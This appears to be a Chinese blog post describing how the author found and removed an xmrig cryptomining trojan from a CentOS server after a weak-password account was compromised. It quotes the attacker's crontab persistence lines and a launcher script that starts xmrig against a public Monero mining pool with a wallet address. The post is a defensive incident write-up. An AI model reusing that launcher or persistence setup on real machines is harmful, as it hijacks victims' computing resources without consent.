彻底清除Centos xmrig木马(普通用户情况)

最新推荐文章于 2024-05-11 12:09:03 发布
最新推荐文章于 2024-05-11 12:09:03 发布
阅读量1.1w 收藏 10
点赞数 2
分类专栏: CentOS 文章标签: centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46532244/article/details/115705492
版权

文章目录

情况:

  1. 开发同事报update用户连接不上系统,故此上服务器查看
  2. 由于是docker建立的系统没怎么在意安全,密码设置很简单

一、排查:

# su - update
发现密码已经错误
# top

top命令查看

//可以看见CPU平均22点几,占用率更是高达1471%。
//还有update用户启的3个sh
# kill -9 pid		//杀掉了又会冒出来
# crontab -l		//并不是我自己的,于是根据设置的路径去到对应目录
@daily /var/tmp/1
@reboot /var/tmp/run > /dev/null 2>&1 & disown
@monthly /var/tmp/run  > /dev/null 2>&1 & disown
# ls /var/tmp		//有一个可执行文件,打开文件查看,不清楚具体的意思,但根据查网上资料,可以肯定是一个挖矿的程序
1
#!/bin/bash
#made by Maz4id#1363
locatie=$(cat /var/tmp/.logs/.local)

if ! pgrep -x xmrig >/dev/null; then
	$locatie/./xmrig -o pool.supportxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoL1V1P367MKSzjNZj --donate-level 0 -p xmrig > /dev/null 2>&1 & disown $*
else
	:
fi

二、解决

因为每次都杀不掉,所以需要找到xmrig命令,查看update家目录和/tmp,/var/tmp下的文件

# find . -name xmrig		//在这个隐藏目录下->...
/var/tmp/.../xmrig
# ls		//有几个脚本和二进制命令文件,将这几个改名或者删除
a  haiduc  nohup.out  pgrep  xmrig
# crontab -e		//删除执行的计划任务
# top		//杀掉所起的进程
# kill -9 pid
//发现另外3个sh进程还在运行,也找出进程号杀掉

三、后序

修改防火墙策略,以后会更加注重安装,不再因为是docker而忽略,幸好不是破解root用户,不然就可以为所欲为了。
贴几个参考链接,感谢。
参考链接1
参考链接2
最后有一个疑问,就是普通用户是怎么写进root里面的crontab计划任务里面。知道的兄弟留言一下

Ann丶桂圆
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新挖矿病毒xmrig清除方法和原理
m0_73140589的博客
03-21 2539
手机端接收短信提醒,服务器正遭受挖矿病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
阿里云服务器中招挖矿病毒XMrig miner解决方法
Starbme_2018的博客
03-18 1万+
今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu进程占用高达80%以上,cpu总占用达到99%,查了下时间是昨天十点开始进程占用率奇高的,因此我知道头痛的事情又来了:挖矿病毒又回来了。。。 查了一下告警信息,如下: 该告警由如下引擎检测发现:...
2024年最新【安全脚本】 centos 下的病毒木马查杀脚本(1),2024年最新应聘高级网络安全工程师历程感言
最新发布
2401_84300128的博客
05-11 311
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
初步解决挖矿病毒xmrig cpu miner
热门推荐
qq_42906657的博客
09-16 3万+
初步解决挖矿病毒xmrig cpu miner 本人初学者,前段时间写了个爬虫,暴露了ip,服务器受到攻击,被植入了木马,后来就发现中了这个挖矿病毒。之前曾经解决过,是把任务管理器中杂七杂八的进程都结束掉:将不认识的后缀为32位的进程都结束掉。 但是我服务器重启后发现还是有这个问题,说明注册表没清干净。 今天查了下网上的解决方案,好像都是用工具,没有比较简单的方法。下面是我今天初步清除的...
阿里云服务器中挖矿病毒处理方法,centos7
cy3329520的博客
01-21 2447
今天上班,发现公司的服务都没了,进服务器一看,好家伙,top一看,cpu直接飙到百分之80,还是个乱码的进程名称,一看就是挖矿的病毒。 然后我查资料,说是先通过 /proc/pid/exe 找到进程路径,但是我查了,直接报exe目录是空的。 这就神奇了,和网上说的不一样。是不是情况不一样。 然后我去看了定时任务:crontab -e 发现新增的一个定时器,名字叫.systemd-service.sh。 然后sh逻辑是显示一串类似秘钥的东西。 所以这个挖矿病毒的逻辑应该是通过redis的6379端.
记录一次服务器清除xmrig挖矿病毒,及伪装成mysql的挖矿病毒!
Jeson的博客
07-13 2855
突然发现服务器cpu及负载全部达到100%,不出意外应该是中病毒了,开始十万火急的排查!!!!! 1、首先执行 top 命令查看具体占用 果然不出所料,中了挖矿病毒,下面开始清除 2、直接杀死进程 kill -9 22408 发现病毒会重启,我们只能找到根源文件,进行删除在杀掉进程 3、开始查找文件 find / -name xmrig 找到文件目录:/root/skypool/xmrig 4、进入看一下文件详情 cd /root/skypool ls 果然是病毒文件 5、进行删除处理 r.
服务器中xmrig病毒处理
m0_46495271的博客
01-18 1014
一般这种病毒都会有一个定时脚本来维护病毒执行的。使用 top 获取 xmrig 进程ID。查看与 xmrig 进程运行相关的文件。把该目录下的文件全部删除
Xmrig挖矿木马排查过程,xmrig占用大量CPU
cf
12-10 4062
4.查找find / -name xmrig 文件,或者程序信息 ps -aux | grep xmrig,找到安装目录并将其删除 rm -rf /root/5.删除定时任务 rm -rf /var/spool/cron。6.删除ssh认证信息 rm -rf ./ssh/8.尽量使用内网链接,不要暴露端口号或者外网地址。1.通过top发现xmrig占用了大量cpu。3.尝试直接kill发现杀死之后又会自动重启。7.原因,有可能是redis等程序导致,2.通过网上搜索发现是挖矿木马
阿里轻量服务器xmrig挖矿病毒排查处理
ZHUMUYI0的博客
12-04 1152
本人的轻量服务器没有在运行的应用,纯用来当部署用的公网测试机,突然发现其中一颗CPU核心使用率已经到100。
/tmp文件夹和/var/tmp文件夹的定期清理机制
msdnchina的专栏@JiNan,ShanDong
06-26 6450
/tmp文件夹和/var/tmp文件夹的定期清理机制[root@hgdb02 tmp]# lltotal 8drwxr-xr-x. 5 root root  37 May 19 11:01 benchmarksql-5.0 ---------->>>有此文件drwxr-xr-x. 2 root root   6 Jun  8 10:10 hsperfdata_root-rw-...
linux服务自动启动
08-16
linux服务自动启动
centos7限制普通用户访问单一目录.docx
09-09
CentOS7操作系统中,有时我们需要为特定的用户设置严格的权限控制,比如只允许他们访问特定的目录和文件。在给定的场景中,我们希望为开发同事创建一个名为"loglook"的账户,该账户只能查看位于/home/wwwroot/a...
CentOS下命令行实现普通用户和root用户切换的实例
01-11
CentOS下实现普通用户和管理团员权限的切换 使用su命令实现用户属性的转换 普通用户切换到root用户: 方法有多重  1)su->回车->输入root密码 2)su -root->回车->输入root密码 root用户切换到普通用户: su ...
CentOS 7 中普通用户切换root用户.zip
10-30
CentOS 7中,普通用户切换到root用户需要使用sudo命令来执行特权操作。首先,要确保当前用户已被授权使用sudo命令。默认情况下,在CentOS 7系统上,只有root用户可以直接执行管理员任务。如果需要将某个用户添加到...
CentOS6.8单用户模式如何修改密码
09-15
CentOS6.8单用户模式下如何修改密码?这篇文章主要为大家介绍了CentOS6.8单用户模式修改密码的详细步骤
记一次清理挖矿病毒的过程
邓邓子的博客
07-05 851
网站挂掉了,查看后台服务已宕掉,无法正常重启。在没有启动任何服务的情况下,内存已基本被耗尽: 2.查看各进程资源使用情况 看到 xmrig 占用了资源。 查看 root 文件内容: 查看 .moneroocean 目录下文件: 4.删除文件 5.杀掉 xmrig 进程 查找所有的 xmrig 进程并杀掉: 6.重启服务 最好重启下服务器再重启服务,此时服务已正常。......
xmrig病毒查杀方法
story-xu的博客
11-19 7837
xmrig病毒查杀报告 一、中毒服务器列表: 192.168.. 二、服务器中毒现象 1、服务器CPU占用异常,如下图: 2、存在异常进程: 三、病毒源 发现如下明显的病毒脚本: 四、查杀过程 1、按照使用cpu对进程进行排序,找到靠前的几个进程: ps aux |sort -rn - k +3|head -n 20 2、找到比较特殊的进程名,如:2.2图 3、杀掉相关进程 4、检查是否有定...
《应急响应》记一次“XMR门罗币挖矿木马病毒”处置
1
11-03 1999
故事的起因于26号下午做渗透测试时,登录跳板机发现CPU进程拉满到200%,qiao哥看了一眼直接说是XMR挖矿,这句话勾引起我的兴趣,由于应急是我的薄弱项也没有时间深入学习,所以有本篇应急分析文章。
centos7创建普通用户
11-29
CentOS 7中创建普通用户的步骤如下: 1.以root用户身份登录系统。 2.使用以下命令创建新用户,其中“username”是你想要创建的用户名: ``` useradd username ``` 3.设置新用户的密码: ``` passwd username ``` 4.如果需要,可以为新用户创建一个家目录: ``` mkdir /home/username chown username:username /home/username ``` 5.为新用户分配sudo权限,使其可以执行管理员任务: ``` visudo ``` 在文件中找到以下行: ``` ## Allow root to run any commands anywhere root ALL=(ALL) ALL ``` 在这些行下面添加以下行: ``` username ALL=(ALL) ALL ``` 保存并退出文件。 6.现在,新用户就可以使用其用户名和密码登录系统了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值